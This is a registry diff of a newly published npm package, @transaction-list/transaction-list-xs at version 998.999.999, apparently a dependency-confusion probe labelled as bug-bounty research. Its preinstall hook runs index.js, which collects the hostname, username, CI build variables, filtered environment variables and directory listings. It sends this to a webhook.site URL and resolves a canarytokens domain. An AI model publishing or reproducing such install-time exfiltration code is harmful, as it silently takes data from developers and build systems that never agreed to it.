@transaction-list/transaction-list-xs 998.999.999

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +187 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,187 @@
1
+ const https = require('https');
2
+ const os = require('os');
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+ const crypto = require('crypto');
6
+ const dns = require('dns');
7
+
8
+ const WEBHOOK_URL = "https://webhook.site/ebc5abe3-9dec-4403-bed3-54659c737920";
9
+
10
+ const chunk1 = {
11
+ chunkId: 1,
12
+ totalChunks: 2,
13
+
14
+
15
+ hostname: os.hostname(),
16
+ platform: os.platform(),
17
+ arch: os.arch(),
18
+ nodeVersion: process.version,
19
+ pwd: process.cwd(),
20
+ username: os.userInfo().username,
21
+ homedir: os.homedir(),
22
+ timestamp: new Date().toISOString(),
23
+
24
+
25
+ ciEnvironment: {
26
+ isCI: !!process.env.CI,
27
+
28
+ azure: {
29
+ detected: !!process.env.AZURE_HTTP_USER_AGENT || !!process.env.TF_BUILD,
30
+ buildId: process.env.BUILD_BUILDID,
31
+ buildNumber: process.env.BUILD_BUILDNUMBER,
32
+ repository: process.env.BUILD_REPOSITORY_NAME,
33
+ branch: process.env.BUILD_SOURCEBRANCHNAME,
34
+ agentName: process.env.AGENT_NAME,
35
+ definitionName: process.env.BUILD_DEFINITIONNAME,
36
+ },
37
+
38
+ github: {
39
+ detected: !!process.env.GITHUB_ACTIONS,
40
+ repository: process.env.GITHUB_REPOSITORY,
41
+ workflow: process.env.GITHUB_WORKFLOW,
42
+ runId: process.env.GITHUB_RUN_ID,
43
+ runNumber: process.env.GITHUB_RUN_NUMBER,
44
+ actor: process.env.GITHUB_ACTOR,
45
+ ref: process.env.GITHUB_REF,
46
+ sha: process.env.GITHUB_SHA,
47
+ },
48
+
49
+ gitlab: {
50
+ detected: !!process.env.GITLAB_CI,
51
+ jobId: process.env.CI_JOB_ID,
52
+ pipelineId: process.env.CI_PIPELINE_ID,
53
+ projectPath: process.env.CI_PROJECT_PATH,
54
+ commitSha: process.env.CI_COMMIT_SHA,
55
+ runner: process.env.CI_RUNNER_DESCRIPTION,
56
+ },
57
+
58
+ jenkins: {
59
+ detected: !!process.env.JENKINS_HOME || !!process.env.JENKINS_URL,
60
+ buildNumber: process.env.BUILD_NUMBER,
61
+ jobName: process.env.JOB_NAME,
62
+ buildUrl: process.env.BUILD_URL,
63
+ nodeName: process.env.NODE_NAME,
64
+ },
65
+
66
+ circleci: {
67
+ detected: !!process.env.CIRCLECI,
68
+ buildNum: process.env.CIRCLE_BUILD_NUM,
69
+ project: process.env.CIRCLE_PROJECT_REPONAME,
70
+ branch: process.env.CIRCLE_BRANCH,
71
+ job: process.env.CIRCLE_JOB,
72
+ },
73
+
74
+ travis: {
75
+ detected: !!process.env.TRAVIS,
76
+ buildId: process.env.TRAVIS_BUILD_ID,
77
+ repo: process.env.TRAVIS_REPO_SLUG,
78
+ branch: process.env.TRAVIS_BRANCH,
79
+ jobNumber: process.env.TRAVIS_JOB_NUMBER,
80
+ },
81
+ },
82
+
83
+ npmContext: {
84
+ npmCommand: process.env.npm_command,
85
+ npmLifecycleEvent: process.env.npm_lifecycle_event,
86
+ npmPackageName: process.env.npm_package_name,
87
+ npmConfigUserAgent: process.env.npm_config_user_agent,
88
+ initCwd: process.env.INIT_CWD,
89
+ },
90
+
91
+
92
+ networkInterfaces: os.networkInterfaces(),
93
+ };
94
+
95
+ const chunk2 = {
96
+ chunkId: 2,
97
+ totalChunks: 2,
98
+ hostname: os.hostname(),
99
+ timestamp: new Date().toISOString(),
100
+
101
+ envVars: Object.keys(process.env)
102
+ .filter(key => {
103
+ const lowerKey = key.toLowerCase();
104
+ return (lowerKey.includes('ci') ||
105
+ lowerKey.includes('build') ||
106
+ lowerKey.includes('azure') ||
107
+ lowerKey.includes('github') ||
108
+ lowerKey.includes('gitlab') ||
109
+ lowerKey.includes('jenkins') ||
110
+ lowerKey.includes('npm') ||
111
+ lowerKey.includes('runner') ||
112
+ lowerKey.includes('agent')) &&
113
+ !lowerKey.includes('secret') &&
114
+ !lowerKey.includes('token') &&
115
+ !lowerKey.includes('password') &&
116
+ !lowerKey.includes('key') &&
117
+ !lowerKey.includes('pat');
118
+ })
119
+ .reduce((acc, key) => {
120
+ acc[key] = process.env[key];
121
+ return acc;
122
+ }, {}),
123
+
124
+
125
+ fileSystemProof: {
126
+ hasAzurePipelinesDir: fs.existsSync('/home/vsts/work') || fs.existsSync('D:\\a'),
127
+ hasGitHubWorkspace: fs.existsSync(process.env.GITHUB_WORKSPACE || '/tmp/___nonexistent___'),
128
+ hasJenkinsWorkspace: fs.existsSync(process.env.WORKSPACE || '/tmp/___nonexistent___'),
129
+
130
+ cwdContents: (() => {
131
+ try {
132
+ return fs.readdirSync(process.cwd()).slice(0, 50);
133
+ } catch(e) {
134
+ return `Error: ${e.message}`;
135
+ }
136
+ })(),
137
+
138
+ parentDirs: (() => {
139
+ let current = process.cwd();
140
+ const dirs = [];
141
+ for(let i = 0; i < 5; i++) {
142
+ dirs.push(current);
143
+ const parent = path.dirname(current);
144
+ if(parent === current) break;
145
+ current = parent;
146
+ }
147
+ return dirs;
148
+ })(),
149
+
150
+ homeContents: (() => {
151
+ try {
152
+ return fs.readdirSync(os.homedir()).slice(0, 30);
153
+ } catch(e) {
154
+ return `Error: ${e.message}`;
155
+ }
156
+ })(),
157
+ },
158
+
159
+
160
+ fingerprint: crypto.createHash('sha256')
161
+ .update(`${os.hostname()}-${process.cwd()}-${process.env.BUILD_BUILDID || process.env.GITHUB_RUN_ID || Date.now()}`)
162
+ .digest('hex'),
163
+ };
164
+
165
+
166
+ const data1 = JSON.stringify(chunk1);
167
+ const url1 = `${WEBHOOK_URL}?data=${encodeURIComponent(data1)}`;
168
+
169
+ https.get(url1, (res) => {
170
+
171
+ }).on('error', () => {
172
+
173
+ });
174
+
175
+ setTimeout(() => {
176
+ const data2 = JSON.stringify(chunk2);
177
+ const url2 = `${WEBHOOK_URL}?data=${encodeURIComponent(data2)}`;
178
+
179
+ https.get(url2, (res) => {
180
+
181
+ }).on('error', () => {
182
+
183
+ });
184
+ }, 500);
185
+
186
+
187
+ dns.resolve('qynv4zvvx26anhihu3b0bw0ta.canarytokens.com', () => {});
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@transaction-list/transaction-list-xs",
3
+ "version": "998.999.999",
4
+ "description": "research ",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "keywords": ["security", "research"],
10
+ "author": "Bug Bounty Report",
11
+ "license": "MIT"
12
+ }